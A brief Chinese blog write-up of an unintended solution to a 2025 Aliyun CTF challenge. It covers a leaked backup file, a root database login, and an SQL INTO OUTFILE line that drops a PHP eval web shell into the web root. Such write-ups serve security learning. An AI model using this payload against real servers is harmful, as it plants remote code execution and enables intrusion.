159 字
1 分钟
2025阿里云CTF-打卡OK单题非预期wp
地址:AliyunCTF
完整WP:先知社区
进去先扫目录,扫到一个index.php~
,明显~泄露,直接看代码: 通过这段代码,我们能拿到这么几个文件:
/var/www/html/cache.php
/var/www/html/ok.php
/var/www/html/error.php
直接看ok.php
访问进去,是个数据库的登录页面,root
后面就很简单了,直接写马就行,绝对路径代码里也有
select "<?php eval($_POST[1]); ?>" into outfile "/var/www/html/1.php"
2025阿里云CTF-打卡OK单题非预期wp
https://blog.hdsec.cn/posts/2025阿里云ctf-打卡ok单题非预期wp/